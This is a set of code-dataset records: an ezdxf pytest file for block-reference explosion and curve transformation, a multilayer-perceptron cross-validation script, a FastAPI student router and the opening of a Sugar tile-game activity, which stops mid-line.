blockref.dxf.owner\n blockref_insert = blockref.dxf.insert\n\n assert len(msp) == 2 # 2 INSERT\n exploded_entities = blockref.explode()\n assert blockref.is_alive is False, 'Exploded block reference should be destroyed.'\n assert len(exploded_entities) == 2\n assert len(msp) == 3 # 2 INSERT - 1 exploded INSERT + 2 LINE\n\n e = exploded_entities[0]\n # Exploded entities should be stored in the entity database.\n assert e.dxf.handle is not None, 'entity should have a handle'\n assert e.dxf.handle in entitydb\n # Exploded entities should reside in a layout.\n assert e.dxf.owner is not None, 'entity should have an owner'\n assert e.dxf.owner is blockref_owner\n # Exploded entities should be assigned to the same document as the block reference.\n assert e.doc is doc\n\n assert e.dxftype() == 'LINE'\n assert e.dxf.start == blockref_insert\n assert e.dxf.end == blockref_insert + (1, 0)\n\n e = exploded_entities[1]\n assert e.dxftype() == 'LINE'\n assert e.dxf.start == blockref_insert\n assert e.dxf.end == blockref_insert + (0, 1)\n\n\ndef test_03_explode_polyline_bulge(doc, msp):\n blk = doc.blocks.new('Test03')\n blk.add_lwpolyline([(0, 0), (3, 0, 0.5), (6, 0), (9, 0)], format='xyb')\n block_ref = 
msp.add_blockref('Test03', insert=(0, 0), dxfattribs={\n 'yscale': 0.5,\n })\n entities = list(block_ref.virtual_entities(non_uniform_scaling=True))\n assert len(entities) == 3\n\n e = entities[0]\n assert e.dxftype() == 'LINE'\n assert e.dxf.start == (0, 0)\n assert e.dxf.end == (3, 0)\n\n e = entities[1]\n e = cast(Ellipse, e)\n assert e.dxftype() == 'ELLIPSE'\n assert e.dxf.center.isclose((4.5, 0.5625, 0))\n assert e.dxf.major_axis.isclose((1.875, 0.0, 0))\n assert e.dxf.ratio == 0.5\n assert math.isclose(e.dxf.start_param, -2.498091544796509 % math.tau)\n assert math.isclose(e.dxf.end_param, -0.6435011087932843 % math.tau)\n assert e.start_point.isclose(Vector(3, 0, 0))\n assert e.end_point.isclose(Vector(6, 0, 0), abs_tol=1e-5)\n\n e = entities[2]\n assert e.dxftype() == 'LINE'\n assert e.dxf.start == (6, 0)\n assert e.dxf.end == (9, 0)\n\n\ndef test_04_explode_blockref_with_attrib(doc, msp, entitydb):\n blockref = msp.add_blockref('Test1', (20, 10)) # with attrib\n blockref.add_attrib(tag='TAG', text='Text', insert=(1.5, 2.6))\n assert len(blockref.attribs) == 1, 'Error in add_attrib()'\n attrib = blockref.attribs[0]\n\n exploded_entities = blockref.explode()\n assert blockref.is_alive is False, 'Exploded block reference should be destroyed.'\n assert attrib.is_alive is False, 'Exploded attribs should be destroyed.'\n assert len(exploded_entities) == 3, '2x LINE and 1x TEXT'\n text = exploded_entities[-1]\n assert text.dxftype() == 'TEXT'\n assert text.dxf.text == 'Text'\n assert text.dxf.insert == (1.5, 2.6), 'ATTRIB already located in WCS'\n\n\ndef test_05_examine_uniform_scaled_ellipse(doc, msp):\n blk = doc.blocks.new('EllipseBlk')\n blk.add_ellipse((0, 0), major_axis=(2, 0), ratio=0.5)\n blkref = msp.add_blockref('EllipseBlk', insert=(2, 2)).scale(2)\n ellipse = list(blkref.virtual_entities())[0]\n assert ellipse.dxftype() == 'ELLIPSE'\n assert ellipse.dxf.center == (2, 2)\n assert ellipse.dxf.major_axis == (4, 0)\n assert ellipse.dxf.ratio == 0.5\n\n\ndef test_06_skipped_entities_callback(doc, msp):\n blk = doc.blocks.new('test_block')\n hatch = blk.add_hatch()\n edge_path = hatch.paths.add_edge_path()\n edge_path.add_arc((0, 0))\n blk.add_line((0, 0), (1, 0))\n blkref = msp.add_blockref('test_block', insert=(0, 0)).place((0, 0), (1, 2, 3))\n skipped_entities = []\n\n def on_entity_skipped(entity, reason):\n skipped_entities.append((entity, reason))\n\n assert not blkref.has_uniform_scaling\n assert hatch.paths.has_critical_elements()\n entities = list(blkref.virtual_entities(non_uniform_scaling=True, skipped_entity_callback=on_entity_skipped))\n\n assert len(entities) == 1\n assert entities[0].dxftype() == 'LINE'\n assert len(skipped_entities) == 1\n assert skipped_entities[0][0].dxftype() == 'HATCH'\n assert skipped_entities[0][1] == 'unsupported non-uniform scaling'\n\n\ndef _get_transformed_curve(scale_factors: Vector, rotation: float, is_arc: bool) -> Union[Ellipse, Arc]:\n doc = ezdxf.new()\n blk = doc.blocks.new('block')\n if is_arc:\n blk.add_arc((0, 0), radius=1, start_angle=0, end_angle=math.degrees(math.pi / 2))\n else:\n blk.add_ellipse((0, 0), major_axis=(1, 0), ratio=1, start_param=0, end_param=math.pi / 2)\n\n assert blk[0].start_point.isclose(Vector(1, 0, 0))\n assert blk[0].end_point.isclose(Vector(0, 1, 0))\n\n blk.add_point((1, 0))\n blk.add_point((0, 1))\n block_ref = doc.modelspace().add_blockref('block', insert=(0, 0), dxfattribs={\n 'xscale': scale_factors.x, 'yscale': scale_factors.y, 'zscale': scale_factors.z,\n 'rotation': math.degrees(rotation)\n })\n 
entities = list(block_ref.virtual_entities(non_uniform_scaling=True))\n assert len(entities) == 3\n\n if is_arc and block_ref.has_uniform_scaling:\n assert entities[0].dxftype() == 'ARC'\n else:\n assert entities[0].dxftype() == 'ELLIPSE'\n ellipse = cast(Union[Ellipse, Arc], entities[0])\n\n # points should have been transformed the same as the ellipse\n assert entities[1].dxftype() == 'POINT'\n start_point = cast(Point, entities[1])\n assert start_point.dxf.location.isclose(ellipse.start_point)\n assert entities[2].dxftype() == 'POINT'\n end_point = cast(Point, entities[2])\n assert end_point.dxf.location.isclose(ellipse.end_point)\n\n return ellipse\n\n\ndef _check_curve(ellipse: Ellipse, expected_start: Vector, expected_end: Vector, expected_extrusion: Vector):\n assert ellipse.start_point.isclose(expected_start)\n assert ellipse.end_point.isclose(expected_end)\n assert ellipse.dxf.extrusion.isclose(expected_extrusion)\n\n\n# TODO: currently zscale=-1 is failing\n#@pytest.mark.parametrize('zscale,is_arc', [(1, False), (0.5, False), (1, True), (0.5, True), (-1, False), (-1, True)])\n@pytest.mark.parametrize('zscale,is_arc', [(1, False), (0.5, False), (1, True), (0.5, True)])\ndef test_07_rotated_and_reflected_curves(zscale, is_arc):\n scale = Vector(1, 1, zscale)\n\n ellipse = _get_transformed_curve(scale, 0.0, is_arc)\n _check_curve(ellipse, Vector(1, 0, 0), Vector(0, 1, 0), Vector(0, 0, zscale))\n\n ellipse = _get_transformed_curve(scale, math.pi / 2, is_arc)\n _check_curve(ellipse, Vector(0, 1, 0), Vector(-1, 0, 0), Vector(0, 0, zscale))\n\n ellipse = _get_transformed_curve(scale, math.pi, is_arc)\n _check_curve(ellipse, Vector(-1, 0, 0), Vector(0, -1, 0), Vector(0, 0, zscale))\n\n ellipse = _get_transformed_curve(scale, 3 * math.pi / 2, is_arc)\n _check_curve(ellipse, Vector(0, -1, 0), Vector(1, 0, 0), Vector(0, 0, zscale))\n\n scale = Vector(1, -1, zscale)\n\n ellipse = _get_transformed_curve(scale, 0.0, is_arc)\n _check_curve(ellipse, Vector(1, 0, 0), Vector(0, -1, 0), Vector(0, 0, zscale))\n\n ellipse = _get_transformed_curve(scale, math.pi / 2, is_arc)\n _check_curve(ellipse, Vector(0, 1, 0), Vector(1, 0, 0), Vector(0, 0, zscale))\n\n ellipse = _get_transformed_curve(scale, math.pi, is_arc)\n _check_curve(ellipse, Vector(-1, 0, 0), Vector(0, 1, 0), Vector(0, 0, zscale))\n\n ellipse = _get_transformed_curve(scale, 3 * math.pi / 2, is_arc)\n _check_curve(ellipse, Vector(0, -1, 0), Vector(-1, 0, 0), Vector(0, 0, zscale))\n\n scale = Vector(-1, 1, zscale)\n\n ellipse = _get_transformed_curve(scale, 0.0, is_arc)\n _check_curve(ellipse, Vector(-1, 0, 0), Vector(0, 1, 0), Vector(0, 0, zscale))\n\n ellipse = _get_transformed_curve(scale, math.pi / 2, is_arc)\n _check_curve(ellipse, Vector(0, -1, 0), Vector(-1, 0, 0), Vector(0, 0, zscale))\n\n ellipse = _get_transformed_curve(scale, math.pi, is_arc)\n _check_curve(ellipse, Vector(1, 0, 0), Vector(0, -1, 0), Vector(0, 0, zscale))\n\n ellipse = _get_transformed_curve(scale, 3 * math.pi / 2, is_arc)\n _check_curve(ellipse, Vector(0, 1, 0), Vector(1, 0, 0), Vector(0, 0, zscale))\n\n scale = Vector(-1, -1, zscale)\n\n ellipse = _get_transformed_curve(scale, 0.0, is_arc)\n _check_curve(ellipse, Vector(-1, 0, 0), Vector(0, -1, 0), Vector(0, 0, zscale))\n\n ellipse = _get_transformed_curve(scale, math.pi / 2, is_arc)\n _check_curve(ellipse, Vector(0, -1, 0), Vector(1, 0, 0), Vector(0, 0, zscale))\n\n ellipse = _get_transformed_curve(scale, math.pi, is_arc)\n _check_curve(ellipse, Vector(1, 0, 0), Vector(0, 1, 0), Vector(0, 0, zscale))\n\n 
ellipse = _get_transformed_curve(scale, 3 * math.pi / 2, is_arc)\n _check_curve(ellipse, Vector(0, 1, 0), Vector(-1, 0, 0), Vector(0, 0, zscale))\n\n\n@pytest.mark.parametrize('stretch,is_arc', [(0.5, False), (0.5, True)])\ndef test_08_rotated_and_reflected_and_stretched_curves(stretch, is_arc):\n scale = Vector(1, stretch, 1)\n\n ellipse = _get_transformed_curve(scale, 0.0, is_arc)\n _check_curve(ellipse, Vector(1, 0, 0), Vector(0, stretch, 0), Vector(0, 0, 1))\n\n ellipse = _get_transformed_curve(scale, math.pi / 2, is_arc)\n _check_curve(ellipse, Vector(0, 1, 0), Vector(-stretch, 0, 0), Vector(0, 0, 1))\n\n ellipse = _get_transformed_curve(scale, math.pi, is_arc)\n _check_curve(ellipse, Vector(-1, 0, 0), Vector(0, -stretch, 0), Vector(0, 0, 1))\n\n ellipse = _get_transformed_curve(scale, 3 * math.pi / 2, is_arc)\n _check_curve(ellipse, Vector(0, -1, 0), Vector(stretch, 0, 0), Vector(0, 0, 1))\n\n scale = Vector(1, -stretch, 1)\n\n ellipse = _get_transformed_curve(scale, 0.0, is_arc)\n _check_curve(ellipse, Vector(1, 0, 0), Vector(0, -stretch, 0), Vector(0, 0, 1))\n\n ellipse = _get_transformed_curve(scale, math.pi / 2, is_arc)\n _check_curve(ellipse, Vector(0, 1, 0), Vector(stretch, 0, 0), Vector(0, 0, 1))\n\n ellipse = _get_transformed_curve(scale, math.pi, is_arc)\n _check_curve(ellipse, Vector(-1, 0, 0), Vector(0, stretch, 0), Vector(0, 0, 1))\n\n ellipse = _get_transformed_curve(scale, 3 * math.pi / 2, is_arc)\n _check_curve(ellipse, Vector(0, -1, 0), Vector(-stretch, 0, 0), Vector(0, 0, 1))\n\n scale = Vector(-1, stretch, 1)\n\n ellipse = _get_transformed_curve(scale, 0.0, is_arc)\n _check_curve(ellipse, Vector(-1, 0, 0), Vector(0, stretch, 0), Vector(0, 0, 1))\n\n ellipse = _get_transformed_curve(scale, math.pi / 2, is_arc)\n _check_curve(ellipse, Vector(0, -1, 0), Vector(-stretch, 0, 0), Vector(0, 0, 1))\n\n ellipse = _get_transformed_curve(scale, math.pi, is_arc)\n _check_curve(ellipse, Vector(1, 0, 0), Vector(0, -stretch, 0), Vector(0, 0, 1))\n\n ellipse = _get_transformed_curve(scale, 3 * math.pi / 2, is_arc)\n _check_curve(ellipse, Vector(0, 1, 0), Vector(stretch, 0, 0), Vector(0, 0, 1))\n\n scale = Vector(-1, -stretch, 1)\n\n ellipse = _get_transformed_curve(scale, 0.0, is_arc)\n _check_curve(ellipse, Vector(-1, 0, 0), Vector(0, -stretch, 0), Vector(0, 0, 1))\n\n ellipse = _get_transformed_curve(scale, math.pi / 2, is_arc)\n _check_curve(ellipse, Vector(0, -1, 0), Vector(stretch, 0, 0), Vector(0, 0, 1))\n\n ellipse = _get_transformed_curve(scale, math.pi, is_arc)\n _check_curve(ellipse, Vector(1, 0, 0), Vector(0, stretch, 0), Vector(0, 0, 1))\n\n ellipse = _get_transformed_curve(scale, 3 * math.pi / 2, is_arc)\n _check_curve(ellipse, Vector(0, 1, 0), Vector(-stretch, 0, 0), Vector(0, 0, 1))\n\n\nif __name__ == '__main__':\n pytest.main([__file__])\n", "repo_name": "DatacloudIntl/dc_ezdxf", "sub_path": "tests/test_04_dxf_high_level_structs/test_414_explode_blockrefs.py", "file_name": "test_414_explode_blockrefs.py", "file_ext": "py", "file_size_in_byte": 13798, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "ezdxf.new", "line_number": 14, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 12, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 24, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 29, "usage_type": "call"}, {"api_name": "typing.cast", "line_number": 122, "usage_type": "call"}, {"api_name": "ezdxf.entities.Ellipse", 
"line_number": 122, "usage_type": "argument"}, {"api_name": "math.isclose", "line_number": 127, "usage_type": "call"}, {"api_name": "math.tau", "line_number": 127, "usage_type": "attribute"}, {"api_name": "math.isclose", "line_number": 128, "usage_type": "call"}, {"api_name": "math.tau", "line_number": 128, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 129, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 130, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 188, "usage_type": "name"}, {"api_name": "ezdxf.new", "line_number": 189, "usage_type": "call"}, {"api_name": "math.degrees", "line_number": 192, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 192, "usage_type": "attribute"}, {"api_name": "math.pi", "line_number": 194, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 196, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 197, "usage_type": "call"}, {"api_name": "math.degrees", "line_number": 203, "usage_type": "call"}, {"api_name": "typing.cast", "line_number": 212, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 212, "usage_type": "name"}, {"api_name": "ezdxf.entities.Ellipse", "line_number": 212, "usage_type": "name"}, {"api_name": "ezdxf.entities.Arc", "line_number": 212, "usage_type": "name"}, {"api_name": "typing.cast", "line_number": 216, "usage_type": "call"}, {"api_name": "ezdxf.entities.Point", "line_number": 216, "usage_type": "argument"}, {"api_name": "typing.cast", "line_number": 219, "usage_type": "call"}, {"api_name": "ezdxf.entities.Point", "line_number": 219, "usage_type": "argument"}, {"api_name": "typing.Union", "line_number": 188, "usage_type": "name"}, {"api_name": "ezdxf.entities.Ellipse", "line_number": 188, "usage_type": "name"}, {"api_name": "ezdxf.entities.Arc", "line_number": 188, "usage_type": "name"}, {"api_name": "ezdxf.entities.Ellipse", "line_number": 225, "usage_type": "name"}, {"api_name": "ezdxf.math.Vector", "line_number": 225, "usage_type": "name"}, {"api_name": "ezdxf.math.Vector", "line_number": 235, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 238, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 240, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 241, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 243, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 244, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 246, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 247, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 249, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 252, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 254, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 255, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 257, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 258, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 260, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 261, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 263, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 266, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 268, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", 
"line_number": 269, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 271, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 272, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 274, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 275, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 277, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 280, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 282, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 283, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 285, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 286, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 288, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 289, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 233, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 233, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 294, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 297, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 299, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 300, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 302, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 303, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 305, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 306, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 308, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 311, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 313, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 314, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 316, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 317, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 319, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 320, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 322, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 325, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 327, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 328, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 330, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 331, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 333, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 334, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 336, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 339, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 341, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 342, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 344, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 345, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 347, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 348, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", 
"line_number": 292, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 292, "usage_type": "attribute"}, {"api_name": "pytest.main", "line_number": 352, "usage_type": "call"}]}
+{"seq_id": "12878303693", "text": "import numpy as np\nimport pandas as pd\nimport multiLayerPerceptron.MLP_layer as layer\nfrom multiLayerPerceptron.MLP_network import MultiLayerPerceptron\nfrom sklearn.datasets import load_boston\nfrom keras.datasets import mnist\nfrom keras.utils import np_utils\nfrom sklearn.model_selection import KFold \nfrom sklearn.preprocessing import MinMaxScaler \nimport math \nfrom metrics import *\n\nX = load_boston().data\ny= load_boston().target\nscalar = MinMaxScaler()\nscalar.fit(X)\nX = scalar.transform(X)\nX = X.reshape(X.shape[0], 1, 13)\nX = X.astype('float32')\n\n# Defining the Network\nnet = MultiLayerPerceptron()\nnet.add(layer.FullyConnectedLayer(13, 40)) \nnet.add(layer.ActivationLayer(layer.sigmoid, layer.sigmoid_prime))\nnet.add(layer.FullyConnectedLayer(40, 13)) \nnet.add(layer.ActivationLayer(layer.sigmoid, layer.sigmoid_prime))\nnet.add(layer.FullyConnectedLayer(13, 1)) \n\nkf = KFold(n_splits=3)\n\ni = 1\nov_rmse = 0\nnet.use(layer.mse, layer.mse_prime)\nfor train_index, test_index in kf.split(X):\n X_train = X[train_index]\n y_train = y[train_index]\n X_test = X[test_index]\n y_test = y[test_index]\n\n net.fit(X_train, y_train, epochs=100, learning_rate=3e-3)\n y_hat = net.predict(X_test)\n rmse_curr = rmse(pd.Series(y_hat),pd.Series(y_test))\n print(f\"RMSE error for Fold {i}:\", rmse_curr)\n ov_rmse += rmse_curr\n i+=1\n\nprint(\"Overall RMSE:\", ov_rmse/3)\n\n\n", "repo_name": "AdityaPusalkar/assignment-3-AdityaPusalkar", "sub_path": "q6b.py", "file_name": "q6b.py", "file_ext": "py", "file_size_in_byte": 1413, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sklearn.datasets.load_boston", "line_number": 13, "usage_type": "call"}, {"api_name": "sklearn.datasets.load_boston", "line_number": 14, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 15, "usage_type": "call"}, {"api_name": "multiLayerPerceptron.MLP_network.MultiLayerPerceptron", "line_number": 22, "usage_type": "call"}, {"api_name": "multiLayerPerceptron.MLP_layer.FullyConnectedLayer", "line_number": 23, "usage_type": "call"}, {"api_name": "multiLayerPerceptron.MLP_layer", "line_number": 23, "usage_type": "name"}, {"api_name": "multiLayerPerceptron.MLP_layer.ActivationLayer", "line_number": 24, "usage_type": "call"}, {"api_name": "multiLayerPerceptron.MLP_layer", "line_number": 24, "usage_type": "name"}, {"api_name": "multiLayerPerceptron.MLP_layer.sigmoid", "line_number": 24, "usage_type": "attribute"}, {"api_name": "multiLayerPerceptron.MLP_layer.sigmoid_prime", "line_number": 24, "usage_type": "attribute"}, {"api_name": "multiLayerPerceptron.MLP_layer.FullyConnectedLayer", "line_number": 25, "usage_type": "call"}, {"api_name": "multiLayerPerceptron.MLP_layer", "line_number": 25, "usage_type": "name"}, {"api_name": "multiLayerPerceptron.MLP_layer.ActivationLayer", "line_number": 26, "usage_type": "call"}, {"api_name": "multiLayerPerceptron.MLP_layer", "line_number": 26, "usage_type": "name"}, {"api_name": "multiLayerPerceptron.MLP_layer.sigmoid", "line_number": 26, "usage_type": "attribute"}, {"api_name": "multiLayerPerceptron.MLP_layer.sigmoid_prime", "line_number": 26, "usage_type": "attribute"}, {"api_name": "multiLayerPerceptron.MLP_layer.FullyConnectedLayer", "line_number": 27, "usage_type": "call"}, {"api_name": "multiLayerPerceptron.MLP_layer", "line_number": 27, "usage_type": "name"}, {"api_name": "sklearn.model_selection.KFold", "line_number": 29, 
"usage_type": "call"}, {"api_name": "multiLayerPerceptron.MLP_layer.mse", "line_number": 33, "usage_type": "attribute"}, {"api_name": "multiLayerPerceptron.MLP_layer", "line_number": 33, "usage_type": "name"}, {"api_name": "multiLayerPerceptron.MLP_layer.mse_prime", "line_number": 33, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 42, "usage_type": "call"}]}
+{"seq_id": "18020203725", "text": "from typing import List\nfrom fastapi import APIRouter, HTTPException\nfrom app.models.Alumno import Alumno\nimport logging\n\nlogger = logging.getLogger(__name__)\nrouter = APIRouter(prefix=\"/alumnos\",\n tags=[\"alumnos\"], )\n\n\n@router.get(\"/\", response_model=List[Alumno])\ndef alumnos_get_all():\n # alumnos = Alumno.get_all()\n alumnos = []\n logger.info('alumnos %s', alumnos)\n\n return alumnos\n\n\n@router.get('/{alumno_id}', response_model=Alumno)\ndef get_detail(alumno_id: int):\n alumno = Alumno.get_by_id(alumno_id)\n if alumno is None:\n raise HTTPException(status_code=404, detail=f\"Alumno con id:{alumno_id} not found\")\n\n return alumno\n\n\n@router.put('/{persona_id}', response_model=Alumno)\ndef update_detail(alumno_id: int, alumno: Alumno):\n alumno_original = Alumno.get_by_id(alumno_id)\n print(alumno)\n return alumno\n", "repo_name": "cids-arquitectura/fastapi_microservice", "sub_path": "app/routes/alumnos.py", "file_name": "alumnos.py", "file_ext": "py", "file_size_in_byte": 867, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 6, "usage_type": "call"}, {"api_name": "fastapi.APIRouter", "line_number": 7, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 11, "usage_type": "name"}, {"api_name": "app.models.Alumno.Alumno", "line_number": 11, "usage_type": "name"}, {"api_name": "app.models.Alumno.Alumno.get_by_id", "line_number": 22, "usage_type": "call"}, {"api_name": "app.models.Alumno.Alumno", "line_number": 22, "usage_type": "name"}, {"api_name": "fastapi.HTTPException", "line_number": 24, "usage_type": "call"}, {"api_name": "app.models.Alumno.Alumno", "line_number": 20, "usage_type": "name"}, {"api_name": "app.models.Alumno.Alumno", "line_number": 30, "usage_type": "name"}, {"api_name": "app.models.Alumno.Alumno.get_by_id", "line_number": 31, "usage_type": "call"}, {"api_name": "app.models.Alumno.Alumno", "line_number": 31, "usage_type": "name"}, {"api_name": "app.models.Alumno.Alumno", "line_number": 29, "usage_type": "name"}]}
+{"seq_id": "44034596500", "text": "from gettext import gettext as _\n\nimport logging\n_logger = logging.getLogger('paths-activity')\n\nfrom sugar3.graphics import style\nGRID_CELL_SIZE = style.GRID_CELL_SIZE\n\nfrom gi.repository import Gtk\nfrom gi.repository import Gdk\nfrom gi.repository import GObject\n\nfrom grid import Grid\nfrom hand import Hand\nfrom deck import Deck\nfrom tile import error_graphic, highlight_graphic, blank_tile\nfrom utils import json_dump\nfrom constants import ROW, COL, NORTH, EAST, SOUTH, WEST, TILE_WIDTH, \\\n TILE_HEIGHT, HIDE, BOARD, GRID, TILES, TOP, OVER_THE_TOP\nfrom sprites import Sprites\n\nOFFSETS = [-COL, 1, COL, -1]\nMY_HAND = 0\nROBOT_HAND = 1\n\n\nclass Game():\n\n def __init__(self, canvas, parent=None, colors=['#A0FFA0', '#FF8080']):\n self._activity = parent\n self.colors = colors\n\n # Starting from command line\n if parent is None:\n self._running_sugar = False\n self._canvas = canvas\n else:\n self._running_sugar = True\n self._canvas = canvas\n parent.show_all()\n\n self._canvas.set_can_focus(True)\n self._canvas.add_events(Gdk.EventMask.BUTTON_PRESS_MASK |\n Gdk.EventMask.BUTTON_RELEASE_MASK |\n Gdk.EventMask.POINTER_MOTION_MASK)\n self._canvas.connect(\"draw\", self._draw_cb)\n self._canvas.connect(\"button-press-event\", self._button_press_cb)\n self._canvas.connect(\"button-release-event\", self._button_release_cb)\n self._canvas.connect(\"motion-notify-event\", self._mouse_move_cb)\n self._canvas.connect(\"key_press_event\", self._keypress_cb)\n\n self._width = Gdk.Screen.width()\n self._height = Gdk.Screen.height() - (GRID_CELL_SIZE * 1.5)\n self._scale = self._height / (8.0 * TILE_HEIGHT)\n self.tile_width = TILE_WIDTH * self._scale\n self.tile_height = TILE_HEIGHT * self._scale\n\n # Generate the sprites we'll need...\n self._sprites = Sprites(self._canvas)\n self.grid = Grid(self._sprites, self._width, self._height,\n self.tile_width, self.tile_height, self._scale,\n colors[0])\n self.deck = Deck(self._sprites, self._scale, colors[1])\n self.deck.board.move((self.grid.left, self.grid.top))\n self.hands = []\n self.hands.append(Hand(self.tile_width, self.tile_height))\n self._errormsg = []\n for i in range(4):\n self._errormsg.append(error_graphic(self._sprites))\n self._highlight = highlight_graphic(self._sprites, self._scale)\n self._score_card = blank_tile(self._sprites, scale=self._scale * 2,\n color=colors[1])\n self._score_card.set_label_attributes(64)\n self._score_card.move(((int(self._width / 2) - self.tile_width),\n int(self._height / 2) - self.tile_height))\n\n # and initialize a few variables we'll need.\n self.buddies = []\n self._my_hand = MY_HAND\n self.playing_with_robot = False\n self._all_clear()\n\n def _all_clear(self):\n ''' Things to reinitialize when starting up a new game. 
'''\n self._hide_highlight()\n self._hide_errormsgs()\n self.deck.hide()\n self.deck.clear()\n self.grid.clear()\n for hand in self.hands:\n hand.clear()\n self.show_connected_tiles()\n\n self._press = None\n self._release = None\n self._dragpos = [0, 0]\n self._total_drag = [0, 0]\n self.last_spr_moved = None\n self._last_tile_played = None\n self._last_tile_orientation = 0\n self._last_grid_played = None\n\n self.whos_turn = MY_HAND\n self._waiting_for_my_turn = False\n self._waiting_for_robot = False\n self.placed_a_tile = False\n self._there_are_errors = False\n\n self.score = 0\n self._score_card.set_layer(HIDE)\n self._score_card.move(((int(self._width / 2) - self.tile_width),\n int(self._height / 2) - self.tile_height))\n self.saw_game_over = False\n\n def _initiating(self):\n if not self._running_sugar:\n return True\n return self._activity.initiating\n\n def new_game(self, saved_state=None, deck_index=0):\n ''' Start a new game. '''\n self._all_clear()\n\n # If we are not sharing or we are the sharer...\n if not self.we_are_sharing() or self._initiating():\n # Let joiners know we are starting a new game...\n if self.we_are_sharing():\n self._activity.send_event(\"n\", \" \")\n\n # The initiator shuffles the deck...\n self.deck.shuffle()\n # ...and shares it.\n if self.we_are_sharing():\n self._activity.send_event(\"d\", self.deck.serialize())\n\n # Deal a hand to yourself...\n self.hands[self._my_hand].deal(self.deck)\n\n # ...deal a hand to the robot...\n if self.playing_with_robot:\n if len(self.hands) < ROBOT_HAND + 